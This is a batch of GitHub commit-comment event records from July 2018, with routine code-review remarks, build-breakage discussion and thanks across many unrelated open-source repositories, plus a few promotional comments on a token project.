{"id":"8004089078","type":"CommitCommentEvent","actor":{"login":"tomtheone"},"repo":{"name":"horde/horde"},"payload":{"comment":{"id":29800710,"position":null,"line":null,"path":null,"commit_id":"eecdbee303d91dae3613dbf45c1c6634d27340e6","created_at":"2018-07-23T13:58:50Z","updated_at":"2018-07-23T13:58:50Z","author_association":"NONE","body":"I'm running Horde Groupware Webmail Edition 5.2.22 / Calendar (kronolith) 4.2.24 / Horde_ActiveSync 2.39.3\r\n\r\nI miss the code from this commit in the files listed above, at the other hand i see that this commit affects horde_activesync-2.30.4 - i'm confused.\r\n\r\nI found a [workaround](https://features.cpanel.net/topic/option-to-suppress-automated-itip-notifications-when-synchronising-caldav) but would prefer to use the official way.\r\n\r\nHow can i get this modification officially?"}},"created_at":"2018-07-23T13:58:50Z"}
{"id":"8004090681","type":"CommitCommentEvent","actor":{"login":"chrisvanpatten"},"repo":{"name":"restrictcontentpro/restrict-content-pro"},"payload":{"comment":{"id":29800713,"position":null,"line":null,"path":null,"commit_id":"a45fcf197acad4392c1457c321147791657159f6","created_at":"2018-07-23T13:59:05Z","updated_at":"2018-07-23T13:59:05Z","author_association":"CONTRIBUTOR","body":"@daskreativ the whole idea is that this _makes_ it work with newer `composer/installers` versions.\r\n\r\nThe old way, with a tilde, means you can only install versions 1.0.6–1.1.0, but with the caret you can install anything from 1.0.6–2.0.0."}},"created_at":"2018-07-23T13:59:05Z"}
{"id":"8004092949","type":"CommitCommentEvent","actor":{"login":"johannes"},"repo":{"name":"php/php-src"},"payload":{"comment":{"id":29800718,"position":null,"line":null,"path":null,"commit_id":"d6e81f0bfd0cb90586dd83d4fd47a4302605261a","created_at":"2018-07-23T13:59:26Z","updated_at":"2018-07-23T13:59:26Z","author_association":"MEMBER","body":"In what way broken?\n\nOn July 23, 2018 3:56:32 PM GMT+02:00, \"Torsten Zühlsdorff\" <notifications@github.com> wrote:\n>You are welcome :)\n>Sadly i just noticed last week, that the chance was committed to 7.1\n>and 7.2. Now both versions are broken at FreeBSD.\n>\n>Do you think that it will break more if i just patch this out? :D\n"}},"created_at":"2018-07-23T13:59:26Z"}
{"id":"8004093466","type":"CommitCommentEvent","actor":{"login":"krOoze"},"repo":{"name":"KhronosGroup/Vulkan-Docs"},"payload":{"comment":{"id":29800719,"position":20,"line":322,"path":"xml/extensionmetadocgenerator.py","commit_id":"6377124f371f9d8b1d9761b1116fac647222a13d","created_at":"2018-07-23T13:59:31Z","updated_at":"2018-07-23T13:59:31Z","author_association":"CONTRIBUTOR","body":"Good catch, but must be `innerdoc` in order for the extension to not be included in Core Spec. -> #748"}},"created_at":"2018-07-23T13:59:31Z"}
{"id":"8004100522","type":"CommitCommentEvent","actor":{"login":"zoffixznet"},"repo":{"name":"perl6/nqp"},"payload":{"comment":{"id":29800744,"position":null,"line":null,"path":null,"commit_id":"caf545127b49d783e0e821e9b5da67c26e00e9c5","created_at":"2018-07-23T14:00:38Z","updated_at":"2018-07-23T14:00:38Z","author_association":"MEMBER","body":"Automated and [hopefully now fixed](https://github.com/zoffixznet/z/commit/ed4e3d7ba00bdc2718c3c07b6ea28971e47cbdcf)"}},"created_at":"2018-07-23T14:00:38Z"}
{"id":"8004100601","type":"CommitCommentEvent","actor":{"login":"robalb"},"repo":{"name":"cdh-dev/memeinvestor_bot"},"payload":{"comment":{"id":29800746,"position":null,"line":null,"path":null,"commit_id":"8c65cb8a087a57384d962f51e99453fc612d7456","created_at":"2018-07-23T14:00:39Z","updated_at":"2018-07-23T14:00:39Z","author_association":"NONE","body":"this will break the website, so notify me when you want to merge it, and i'll update the user page accordingly"}},"created_at":"2018-07-23T14:00:39Z"}
{"id":"8004101976","type":"CommitCommentEvent","actor":{"login":"NanamiArihara"},"repo":{"name":"3TUSK/FrogCraft-Rebirth"},"payload":{"comment":{"id":29800754,"position":null,"line":null,"path":null,"commit_id":"fbc6324aa4a4ad17cbcc15b33a5e3771bb73ae3d","created_at":"2018-07-23T14:00:51Z","updated_at":"2018-07-23T14:00:51Z","author_association":"NONE","body":"FAQ"}},"created_at":"2018-07-23T14:00:51Z"}
{"id":"8004107601","type":"CommitCommentEvent","actor":{"login":"IppouTsuukou"},"repo":{"name":"perl6/nqp"},"payload":{"comment":{"id":29800763,"position":null,"line":null,"path":null,"commit_id":"caf545127b49d783e0e821e9b5da67c26e00e9c5","created_at":"2018-07-23T14:01:45Z","updated_at":"2018-07-23T14:01:45Z","author_association":"MEMBER","body":"@zoffixznet++"}},"created_at":"2018-07-23T14:01:45Z"}
{"id":"8004109996","type":"CommitCommentEvent","actor":{"login":"grshane"},"repo":{"name":"wvu-online/wvuonline"},"payload":{"comment":{"id":29800772,"position":null,"line":null,"path":null,"commit_id":"2e3a31bbb261b2b38383a7be484c3f02705830b6","created_at":"2018-07-23T14:02:09Z","updated_at":"2018-07-23T14:02:09Z","author_association":"COLLABORATOR","body":"Created multidev environment [wvuonline#ci-352](https://dashboard.pantheon.io/sites/8fb52aa5-5525-4d73-9b84-f2d86faf1da2#ci-352).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-352-wvuonline.pantheonsite.io/)"}},"created_at":"2018-07-23T14:02:09Z"}
{"id":"8004110377","type":"CommitCommentEvent","actor":{"login":"dashimaki360"},"repo":{"name":"OneNightROBOCON/onigiri_war"},"payload":{"comment":{"id":29800773,"position":null,"line":null,"path":null,"commit_id":"2b54a07e1a377161d28d52d1e933033e8385a6a4","created_at":"2018-07-23T14:02:12Z","updated_at":"2018-07-23T14:02:12Z","author_association":"CONTRIBUTOR","body":"表示画面はいじらずに\r\nロボットの制御ノードから直接審判に通信するのは避けたいので\r\nstateの切り替え方を↑で言っている方法に変更した｡\r\n```\r\nbash scripts/sim_with_judge.sh\r\nbash scripts/start.sh　\r\n```\r\nと動かしたときはいい感じに動いている｡"}},"created_at":"2018-07-23T14:02:12Z"}
{"id":"8004112409","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/flask-apscheduler-feedstock"},"payload":{"comment":{"id":29800781,"position":null,"line":null,"path":null,"commit_id":"fd022588b666657cb3147d2dd8ff396966244ea2","created_at":"2018-07-23T14:02:33Z","updated_at":"2018-07-23T14:02:33Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @edetec, @lvoliveira were added to this feedstock maintenance team.\n\nYou should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-23T14:02:33Z"}
{"id":"8004115282","type":"CommitCommentEvent","actor":{"login":"Yragan966"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29800787,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-23T14:03:02Z","updated_at":"2018-07-23T14:03:02Z","author_association":"NONE","body":"An excellent solution to the problem, I fully support.\r\nI personally studied the project and came to the conclusion that this project deserves the attention of investors.\r\nLoyalty company provides its members on time)"}},"created_at":"2018-07-23T14:03:02Z"}
{"id":"8004115588","type":"CommitCommentEvent","actor":{"login":"DovMiller"},"repo":{"name":"DevExpress-Examples/how-to-implement-common-scenarios-within-the-grid-bound-with-the-entitydatasource-ef-e3251"},"payload":{"comment":{"id":29800790,"position":null,"line":null,"path":null,"commit_id":"26e1d7ec531db5229a8716ff245a8804cddeb78a","created_at":"2018-07-23T14:03:05Z","updated_at":"2018-07-23T14:03:05Z","author_association":"NONE","body":"Hello\nMikhailTymchukDX\nThis is the link\nhttps://github.com/DevExpress-Examples/how-to-implement-common-scenarios-within-the-grid-bound-with-the-entitydatasource-ef-e3251/tree/26e1d7ec531db5229a8716ff245a8804cddeb78a\nThank you for your reply. Your link is good.\nDov\nOn Mon, Jul 23, 2018 at 3:53 PM, MikhailTymchukDX <notifications@github.com>\nwrote:\n\n> Hi @DovMiller <https://github.com/DovMiller>\n> I don't see any VB code in the CS folder: https://github.com/DevExpress-\n> Examples/how-to-implement-common-scenarios-within-the-grid-bound-with-the-\n> entitydatasource-ef-e3251/tree/15.1.3%2B/CS/WebSite\n> Would you please share the link you mentioned?\n>\n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/DevExpress-Examples/how-to-implement-common-scenarios-within-the-grid-bound-with-the-entitydatasource-ef-e3251/commit/26e1d7ec531db5229a8716ff245a8804cddeb78a#commitcomment-29799827>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AcFfpZmsdSJt0GbZElI3-PQRPeesV2lRks5uJcc_gaJpZM4Vat0J>\n> .\n>\n"}},"created_at":"2018-07-23T14:03:05Z"}
{"id":"8004118858","type":"CommitCommentEvent","actor":{"login":"domolanya"},"repo":{"name":"domolanya/Example_dom"},"payload":{"comment":{"id":29800796,"position":null,"line":null,"path":null,"commit_id":"9aedf538b496e3b36079c4457b598d2bc9b38d1a","created_at":"2018-07-23T14:03:37Z","updated_at":"2018-07-23T14:03:37Z","author_association":"OWNER","body":"Thanks for let me know update"}},"created_at":"2018-07-23T14:03:37Z"}
{"id":"8004126335","type":"CommitCommentEvent","actor":{"login":"JordyMoos"},"repo":{"name":"jlengrand/elm-dungeon"},"payload":{"comment":{"id":29800805,"position":124,"line":654,"path":"src/elm/Main.elm","commit_id":"5cc4b121967143bb0b452d35ec12705020defc12","created_at":"2018-07-23T14:04:51Z","updated_at":"2018-07-23T14:04:51Z","author_association":"NONE","body":"Is not this what List.sum does?"}},"created_at":"2018-07-23T14:04:51Z"}
{"id":"8004126406","type":"CommitCommentEvent","actor":{"login":"t-zuehlsdorff"},"repo":{"name":"php/php-src"},"payload":{"comment":{"id":29800806,"position":null,"line":null,"path":null,"commit_id":"d6e81f0bfd0cb90586dd83d4fd47a4302605261a","created_at":"2018-07-23T14:04:51Z","updated_at":"2018-07-23T14:04:51Z","author_association":"NONE","body":"It does not compile anymore. This commit enforces the - normally optional - hash extension to be compiled, but in FreeBSD it is disabled by default. Also the hash extension is an separate module to install, so i can't just switch it to on (and violate the POLA rule)."}},"created_at":"2018-07-23T14:04:51Z"}
{"id":"8004135853","type":"CommitCommentEvent","actor":{"login":"julywaltz"},"repo":{"name":"julywaltz/crossin_execrise"},"payload":{"comment":{"id":29800820,"position":null,"line":null,"path":null,"commit_id":"a7e5eac86693ff527ad102f8842fa7714ae7f138","created_at":"2018-07-23T14:06:22Z","updated_at":"2018-07-23T14:06:22Z","author_association":"OWNER","body":"糗百热图抓取小工具，目前下载不稳定，不定期维护升级 "}},"created_at":"2018-07-23T14:06:22Z"}
{"id":"8004140807","type":"CommitCommentEvent","actor":{"login":"qiuksea"},"repo":{"name":"qiuksea/laravel_account"},"payload":{"comment":{"id":29800828,"position":null,"line":null,"path":null,"commit_id":"8cc33cd03aa1f381c1af4ae80df4e0983d3f421c","created_at":"2018-07-23T14:07:10Z","updated_at":"2018-07-23T14:07:10Z","author_association":"OWNER","body":"for my local host"}},"created_at":"2018-07-23T14:07:10Z"}
{"id":"8004145362","type":"CommitCommentEvent","actor":{"login":"mexmer"},"repo":{"name":"libimobiledevice/usbmuxd"},"payload":{"comment":{"id":29800837,"position":null,"line":null,"path":null,"commit_id":"ee85938c21043ef5f7cd4dfbc7677f385814d4d8","created_at":"2018-07-23T14:07:53Z","updated_at":"2018-07-23T14:07:53Z","author_association":"NONE","body":"is this some new command of apple device? or just for usbmux?"}},"created_at":"2018-07-23T14:07:53Z"}
{"id":"8004149999","type":"CommitCommentEvent","actor":{"login":"cmb69"},"repo":{"name":"php/php-src"},"payload":{"comment":{"id":29800866,"position":null,"line":null,"path":null,"commit_id":"d6e81f0bfd0cb90586dd83d4fd47a4302605261a","created_at":"2018-07-23T14:08:39Z","updated_at":"2018-07-23T14:08:39Z","author_association":"CONTRIBUTOR","body":"@johannes You can't compile mysqlnd anymore without ext/hash."}},"created_at":"2018-07-23T14:08:39Z"}
{"id":"8004150200","type":"CommitCommentEvent","actor":{"login":"PixelNotFound"},"repo":{"name":"NamelessMC/Nameless"},"payload":{"comment":{"id":29800868,"position":22,"line":22,"path":"core/assets/plugins/dataTables/DataTables-1.10.16/js/dataTables.moment.js","commit_id":"d129ad9484853e1e95aa278d63db204b7c7b4b1b","created_at":"2018-07-23T14:08:41Z","updated_at":"2018-07-23T14:08:41Z","author_association":"NONE","body":"`$dataTable.pleaseDontTake(\"this serious\");`"}},"created_at":"2018-07-23T14:08:41Z"}
{"id":"8004150989","type":"CommitCommentEvent","actor":{"login":"luoxixi"},"repo":{"name":"luoxixi/js"},"payload":{"comment":{"id":29800870,"position":33,"line":33,"path":"闭包","commit_id":"93b79237b12d014fb18e2893771b0d99dc005e65","created_at":"2018-07-23T14:08:49Z","updated_at":"2018-07-23T14:08:49Z","author_association":"OWNER","body":"\r\n\t\tfor (var j = 0; j < 10; j++) {\r\n\t\t\tmyarr[0](); //输出10个10\r\n\t\t}"}},"created_at":"2018-07-23T14:08:49Z"}
{"id":"8004152683","type":"CommitCommentEvent","actor":{"login":"olysonek"},"repo":{"name":"TomasKorbar/tuned"},"payload":{"comment":{"id":29800872,"position":32,"line":32,"path":"tests/hardware/test_inventory.py","commit_id":"5e4f868313e2886a61b2711adb1bfc2d6f5e898c","created_at":"2018-07-23T14:09:05Z","updated_at":"2018-07-23T14:09:05Z","author_association":"NONE","body":"Hmm, what you're testing here is an implementation detail. Do we really want to do that? I'd suggest to drop this and only test that _handle_udev_event() correctly calls the callback, as you do below. That should be enough."}},"created_at":"2018-07-23T14:09:05Z"}
{"id":"8004154711","type":"CommitCommentEvent","actor":{"login":"javadba"},"repo":{"name":"apache/spark"},"payload":{"comment":{"id":29800876,"position":null,"line":null,"path":null,"commit_id":"8eb5609d8d961e54aa1ed0632f15f5e570fa627a","created_at":"2018-07-23T14:09:25Z","updated_at":"2018-07-23T14:09:25Z","author_association":"CONTRIBUTOR","body":"The message \"must be no less\" is now inconsistent with the logic.  Needs to be set to \"must be greater than\".\r\n\r\nHere is an example of the self inconsistent generated presently :\r\n\r\njava.lang.IllegalArgumentException: requirement failed: The value of\r\nspark.network.timeout=120s must be no less than the value of \r\nspark.executor.heartbeatInterval=120s."}},"created_at":"2018-07-23T14:09:25Z"}
{"id":"8004155445","type":"CommitCommentEvent","actor":{"login":"olysonek"},"repo":{"name":"TomasKorbar/tuned"},"payload":{"comment":{"id":29800879,"position":34,"line":34,"path":"tests/hardware/test_inventory.py","commit_id":"5e4f868313e2886a61b2711adb1bfc2d6f5e898c","created_at":"2018-07-23T14:09:32Z","updated_at":"2018-07-23T14:09:32Z","author_association":"NONE","body":"I'd use a variable for the 'test subsystem' string, as you're using it multiple times..."}},"created_at":"2018-07-23T14:09:32Z"}
{"id":"8004156350","type":"CommitCommentEvent","actor":{"login":"Divyauk"},"repo":{"name":"poornimaarunp/EDAGroupCaseStudy"},"payload":{"comment":{"id":29800883,"position":null,"line":null,"path":null,"commit_id":"6c324d1986f8cfd85d5d3050bf8083126128d0f4","created_at":"2018-07-23T14:09:42Z","updated_at":"2018-07-23T14:09:42Z","author_association":"COLLABORATOR","body":"Data cleaned file"}},"created_at":"2018-07-23T14:09:42Z"}
{"id":"8004158047","type":"CommitCommentEvent","actor":{"login":"Berkmann18"},"repo":{"name":"Berkmann18/MENP"},"payload":{"comment":{"id":29800886,"position":null,"line":null,"path":null,"commit_id":"00017a863f52ec53a1b03e718b902a1811975c0b","created_at":"2018-07-23T14:09:58Z","updated_at":"2018-07-23T14:09:58Z","author_association":"OWNER","body":"This only fixes 1/4 vulnerabilities mentionning #9 "}},"created_at":"2018-07-23T14:09:58Z"}
{"id":"8004161993","type":"CommitCommentEvent","actor":{"login":"olysonek"},"repo":{"name":"TomasKorbar/tuned"},"payload":{"comment":{"id":29800892,"position":36,"line":36,"path":"tests/hardware/test_inventory.py","commit_id":"5e4f868313e2886a61b2711adb1bfc2d6f5e898c","created_at":"2018-07-23T14:10:38Z","updated_at":"2018-07-23T14:10:38Z","author_association":"NONE","body":"You don't seem to actually check CallbackWasCalled. Sorry if I'm reviewing a work-in-progress commit :)."}},"created_at":"2018-07-23T14:10:38Z"}
{"id":"8004169409","type":"CommitCommentEvent","actor":{"login":"olysonek"},"repo":{"name":"TomasKorbar/tuned"},"payload":{"comment":{"id":29800906,"position":42,"line":42,"path":"tests/hardware/test_inventory.py","commit_id":"5e4f868313e2886a61b2711adb1bfc2d6f5e898c","created_at":"2018-07-23T14:11:50Z","updated_at":"2018-07-23T14:11:50Z","author_association":"NONE","body":"Same as above - don't check this implementation detail, only check that `_handle_udev_event` does *not* call the callback."}},"created_at":"2018-07-23T14:11:50Z"}
{"id":"8004171318","type":"CommitCommentEvent","actor":{"login":"mrobaczyk"},"repo":{"name":"mrobaczyk/Stockfish"},"payload":{"comment":{"id":29800910,"position":null,"line":null,"path":null,"commit_id":"2461c11c780e75b83c332025951855a7cd2dfd65","created_at":"2018-07-23T14:12:10Z","updated_at":"2018-07-23T14:12:10Z","author_association":"OWNER","body":"@locutus2 \r\nWhat do you think of this model?\r\n\r\n //TrappedRook[cannot/can_castle][mob]\r\n int TrappedRook[2][4] = { { 184, 140, 96, 52}, { 92, 70, 48, 26 } };\r\n TUNE(TrappedRook);\r\n[...]\r\n // Penalty when trapped by the king, even more if the king cannot castle\r\nelse if (mob <= 3)\r\n{\r\n      File kf = file_of(pos.square<KING>(Us));\r\n      if ((kf < FILE_E) == (file_of(s) < kf))\r\n           score -= make_score(TrappedRook[bool(pos.can_castle(Us))][mob], 0);\r\n}\r\n\r\nDefault params:\r\nTrappedRook[0][0],184,0,368,18.4,0.0020\r\nTrappedRook[0][1],140,0,280,14,0.0020\r\nTrappedRook[0][2],96,0,192,9.6,0.0020\r\nTrappedRook[0][3],52,0,104,5.2,0.0020\r\nTrappedRook[1][0],92,0,184,9.2,0.0020\r\nTrappedRook[1][1],70,0,140,7,0.0020\r\nTrappedRook[1][2],48,0,96,4.8,0.0020\r\nTrappedRook[1][3],26,0,52,2.6,0.0020\r\n\r\n20+0.2 TC 60k games?"}},"created_at":"2018-07-23T14:12:10Z"}
{"id":"8004171656","type":"CommitCommentEvent","actor":{"login":"LilianSmirnova"},"repo":{"name":"LilianSmirnova/Test-"},"payload":{"comment":{"id":29800911,"position":null,"line":null,"path":null,"commit_id":"c9a9f8303598cd829a0df6d1070fe02de07dd1bc","created_at":"2018-07-23T14:12:13Z","updated_at":"2018-07-23T14:12:13Z","author_association":"OWNER","body":"second"}},"created_at":"2018-07-23T14:12:13Z"}
{"id":"8004176740","type":"CommitCommentEvent","actor":{"login":"olysonek"},"repo":{"name":"TomasKorbar/tuned"},"payload":{"comment":{"id":29800919,"position":null,"line":null,"path":null,"commit_id":"5e4f868313e2886a61b2711adb1bfc2d6f5e898c","created_at":"2018-07-23T14:13:01Z","updated_at":"2018-07-23T14:13:01Z","author_association":"NONE","body":"Use tabs instead of spaces here as well."}},"created_at":"2018-07-23T14:13:01Z"}
{"id":"8004192569","type":"CommitCommentEvent","actor":{"login":"Robinlovelace"},"repo":{"name":"Robinlovelace/geocompr"},"payload":{"comment":{"id":29800940,"position":15,"line":494,"path":"05-geometry-operations.Rmd","commit_id":"df2c1006dfe1938b8c77815f344234226e154f69","created_at":"2018-07-23T14:15:37Z","updated_at":"2018-07-23T14:15:37Z","author_association":"OWNER","body":"Heads-up @Nowosad I know this is not nice code. Code janitor skills welcome but I'd be happy with this as it's in base R, is explicit, and works, although I must concede it is ugly!) :shower: "}},"created_at":"2018-07-23T14:15:37Z"}
{"id":"8004193590","type":"CommitCommentEvent","actor":{"login":"ajithrp"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29800941,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-23T14:15:46Z","updated_at":"2018-07-23T14:15:46Z","author_association":"NONE","body":"Looks great!"}},"created_at":"2018-07-23T14:15:46Z"}
{"id":"8004202959","type":"CommitCommentEvent","actor":{"login":"ggrnd0"},"repo":{"name":"ggrnd0/maven-multi-module-unittest-integrationtest-jacoco"},"payload":{"comment":{"id":29800960,"position":null,"line":null,"path":null,"commit_id":"3eff3dae89761d5a174f6acec2ca5bf779bfd85f","created_at":"2018-07-23T14:17:18Z","updated_at":"2018-07-23T14:17:18Z","author_association":"OWNER","body":"There is one good thing.\r\n\r\napplying aggregate.exec for SQube analyzing make it faster than with target/jacoco.exec"}},"created_at":"2018-07-23T14:17:18Z"}
{"id":"8004208778","type":"CommitCommentEvent","actor":{"login":"dungnguyen2020"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29800969,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-23T14:18:15Z","updated_at":"2018-07-23T14:18:15Z","author_association":"NONE","body":"good ico and good job !"}},"created_at":"2018-07-23T14:18:15Z"}
{"id":"8004215578","type":"CommitCommentEvent","actor":{"login":"datreeio[bot]"},"repo":{"name":"codefresh-io/cli"},"payload":{"comment":{"id":29800979,"position":null,"line":null,"path":null,"commit_id":"a99476a6d732232da3c3deb4795e367d1c4187d9","created_at":"2018-07-23T14:19:20Z","updated_at":"2018-07-23T14:19:20Z","author_association":"NONE","body":"\n:cold_sweat: It's not you, it's your code. it may not be aligned with your organization's best practices.\n:shipit: We've got some intel on your code - 7 events were tracked in this pull request\n\nTo view a full list of the events <a href='https://github.com/codefresh-io/cli/pull/212/checks?check_run_id=8805866'>click there</a>\n"}},"created_at":"2018-07-23T14:19:20Z"}
{"id":"8004216446","type":"CommitCommentEvent","actor":{"login":"OwenArnold"},"repo":{"name":"mantidproject/mantid"},"payload":{"comment":{"id":29800983,"position":80,"line":127,"path":"Framework/PythonInterface/mantid/geometry/src/Exports/ComponentInfo.cpp","commit_id":"847337c2cdbf5b0d453435aef70ca0bd1f3e2fe3","created_at":"2018-07-23T14:19:28Z","updated_at":"2018-07-23T14:19:28Z","author_association":"MEMBER","body":"Doesn't read very well. Maybe instead: \"Given the component identified by 'index', returns True only if it has a parent component\"? See others for same issue."}},"created_at":"2018-07-23T14:19:28Z"}
{"id":"8004216513","type":"CommitCommentEvent","actor":{"login":"ai"},"repo":{"name":"ai/autoprefixer-rails"},"payload":{"comment":{"id":29800984,"position":null,"line":null,"path":null,"commit_id":"046ec5e77094877b1afe7bae3b8c06e1ef011436","created_at":"2018-07-23T14:19:29Z","updated_at":"2018-07-23T14:19:29Z","author_association":"OWNER","body":"Oops, I thought Sprockets 4 was released, since they make it free years ago.\r\n\r\nDon't worry, I didn't remove the support itself. Just removed it from test to make Travis CI faster."}},"created_at":"2018-07-23T14:19:29Z"}
{"id":"8004280683","type":"CommitCommentEvent","actor":{"login":"morgvanny"},"repo":{"name":"learn-co-curriculum/js-object-oriented-classes-travel-lab"},"payload":{"comment":{"id":29801134,"position":null,"line":null,"path":null,"commit_id":"e83e925e1fa7c39805cca1bfde853bb654cd1277","created_at":"2018-07-23T14:29:22Z","updated_at":"2018-07-23T14:29:22Z","author_association":"NONE","body":"nah. august 9, 1995 to January 1, 2017 is not 22 years. should still be 21"}},"created_at":"2018-07-23T14:29:22Z"}
{"id":"8004283391","type":"CommitCommentEvent","actor":{"login":"f3l1x"},"repo":{"name":"markruys/nusoap"},"payload":{"comment":{"id":29801142,"position":null,"line":null,"path":null,"commit_id":"8570e4705defc0efffcee7e1ccd1dee3f1c5e374","created_at":"2018-07-23T14:29:47Z","updated_at":"2018-07-23T14:29:47Z","author_association":"NONE","body":"Would you be able to send a PR back to my repo? :-) I would be 🆒 "}},"created_at":"2018-07-23T14:29:47Z"}
{"id":"8004289658","type":"CommitCommentEvent","actor":{"login":"YaroST12"},"repo":{"name":"AOSiP-Devices/kernel_zuk_msm8996"},"payload":{"comment":{"id":29801169,"position":100,"line":700,"path":"block/cfq-iosched.c","commit_id":"abca791aad34abeaf476ead6c54b24abae8e4cf5","created_at":"2018-07-23T14:30:44Z","updated_at":"2018-07-23T14:30:44Z","author_association":"COLLABORATOR","body":"Oh, yeah. Благодарю)"}},"created_at":"2018-07-23T14:30:44Z"}
{"id":"8004296595","type":"CommitCommentEvent","actor":{"login":"sgiraudot"},"repo":{"name":"lrineau/cgal"},"payload":{"comment":{"id":29801190,"position":null,"line":null,"path":null,"commit_id":"4710e1f93dacca4898d6a3f69e4e36ed34c51b0f","created_at":"2018-07-23T14:31:48Z","updated_at":"2018-07-23T14:31:48Z","author_association":"COLLABORATOR","body":"That looks good to me."}},"created_at":"2018-07-23T14:31:48Z"}
{"id":"8004303074","type":"CommitCommentEvent","actor":{"login":"MonishaRaj"},"repo":{"name":"MonishaRaj/HTML"},"payload":{"comment":{"id":29801214,"position":null,"line":null,"path":null,"commit_id":"60132bed52a8851b30cbb6a2b7ecf283c45b3192","created_at":"2018-07-23T14:32:50Z","updated_at":"2018-07-23T14:32:50Z","author_association":"OWNER","body":"<html>\r\nwelcome<br>\r\nwelcome to my page \r\n</html>"}},"created_at":"2018-07-23T14:32:50Z"}
{"id":"8004304804","type":"CommitCommentEvent","actor":{"login":"Rambest007"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29801224,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-23T14:33:08Z","updated_at":"2018-07-23T14:33:08Z","author_association":"NONE","body":" Great project, Strong and well coordinated team, so there are very high chances of success here! In addition, the high-quality implementation of the platform inspires confidence! Good luck 😎👍"}},"created_at":"2018-07-23T14:33:08Z"}
{"id":"8004306256","type":"CommitCommentEvent","actor":{"login":"jingchengcai19861005"},"repo":{"name":"jingchengcai19861005/opencv_test"},"payload":{"comment":{"id":29801226,"position":null,"line":null,"path":null,"commit_id":"696526a798a847471efee5232b35c6b13a2fdc74","created_at":"2018-07-23T14:33:21Z","updated_at":"2018-07-23T14:33:21Z","author_association":"OWNER","body":"seems good"}},"created_at":"2018-07-23T14:33:21Z"}
{"id":"8004308154","type":"CommitCommentEvent","actor":{"login":"discoursebot"},"repo":{"name":"discourse/discourse"},"payload":{"comment":{"id":29801228,"position":null,"line":null,"path":null,"commit_id":"32062864d359b9e842eb3f5f1bbf9c7014a1d857","created_at":"2018-07-23T14:33:38Z","updated_at":"2018-07-23T14:33:38Z","author_association":"NONE","body":"This commit has been mentioned on **Discourse Meta**. There might be relevant details there:\n\nhttps://meta.discourse.org/t/filter-out-discobot-in-engagement-metrics/92800/5\n"}},"created_at":"2018-07-23T14:33:38Z"}
{"id":"8004310241","type":"CommitCommentEvent","actor":{"login":"Nowosad"},"repo":{"name":"Robinlovelace/geocompr"},"payload":{"comment":{"id":29801235,"position":null,"line":null,"path":null,"commit_id":"b9867e0b80ea7a26a3fa75e9cee33f7cab2ba928","created_at":"2018-07-23T14:33:59Z","updated_at":"2018-07-23T14:33:59Z","author_association":"COLLABORATOR","body":"@Robinlovelace I am guilty."}},"created_at":"2018-07-23T14:33:59Z"}
{"id":"8004317337","type":"CommitCommentEvent","actor":{"login":"Yasunari15"},"repo":{"name":"Yasunari15/MacTeX-Uninstaller"},"payload":{"comment":{"id":29801249,"position":null,"line":null,"path":null,"commit_id":"0df902902a4447fe3e7bcff79e4c1211b1317bfa","created_at":"2018-07-23T14:35:05Z","updated_at":"2018-07-23T14:35:05Z","author_association":"OWNER","body":"@ykotaro @softlondon\r\nThank you for following me. Can u help my poor English? Finding a mistake, let me know on this conversation."}},"created_at":"2018-07-23T14:35:05Z"}
{"id":"8004327537","type":"CommitCommentEvent","actor":{"login":"annekainicUSDS"},"repo":{"name":"usds/us-forms-system"},"payload":{"comment":{"id":29801272,"position":9,"line":15,"path":"docs/building-a-form/common-definitions.md","commit_id":"97e13c77ce19a99de5c9e60a86424331e18aa19e","created_at":"2018-07-23T14:36:40Z","updated_at":"2018-07-23T14:36:40Z","author_association":"CONTRIBUTOR","body":"This is a nit, but we wouldn't capitalize the first word in this name, because it's not a React component. And we wouldn't include the word \"widget\" in the name because it's not actually a widget. Let's change this to `currencyUI`."}},"created_at":"2018-07-23T14:36:40Z"}
{"id":"8004327989","type":"CommitCommentEvent","actor":{"login":"protonspring"},"repo":{"name":"protonspring/Stockfish"},"payload":{"comment":{"id":29801274,"position":null,"line":null,"path":null,"commit_id":"cc2e82e25c81e96903dfe7277e8622197b27f458","created_at":"2018-07-23T14:36:44Z","updated_at":"2018-07-23T14:36:44Z","author_association":"OWNER","body":"Thx man.  I appreciate some encouragement.  I'd probably phrase it as \"I'm\nnot smart enough to know when to quit.\"\n\nI've been able to put together pretty decent equations for PassedDanger and\nPassedFile.  Are you saying that something\nlike this would not pass as a simplification, but would probably have to\npass 0,4 or 0,5?\n\nhttp://tests.stockfishchess.org/tests/view/5b54ed820ebc5902bdb83fbd\n\nThis version seems to be as good (or better) than master, but I don't think\nit's good enough to pass 0,4.\n\nOn Mon, Jul 23, 2018 at 8:23 AM, Rocky640 <notifications@github.com> wrote:\n\n> I'm not sure what is your objective with those formulas\n>\n> 2 or 3 years ago, we once had a formula for PassedMg and Eg, but\n> individual values proved better.\n> Until 1 year ago, we once had a formula which was replaced Passed Danger,\n> but individual values proved better.\n>\n> Here is a snippet from Stockfish 6. rr was replaced with our PassedDanger\n>\n> int r = relative_rank(Us, s) - RANK_2;\n>         int rr = r * (r - 1);\n>\n>         // Base bonus based on rank\n>         Value mbonus = Value(17 * rr), ebonus = Value(7 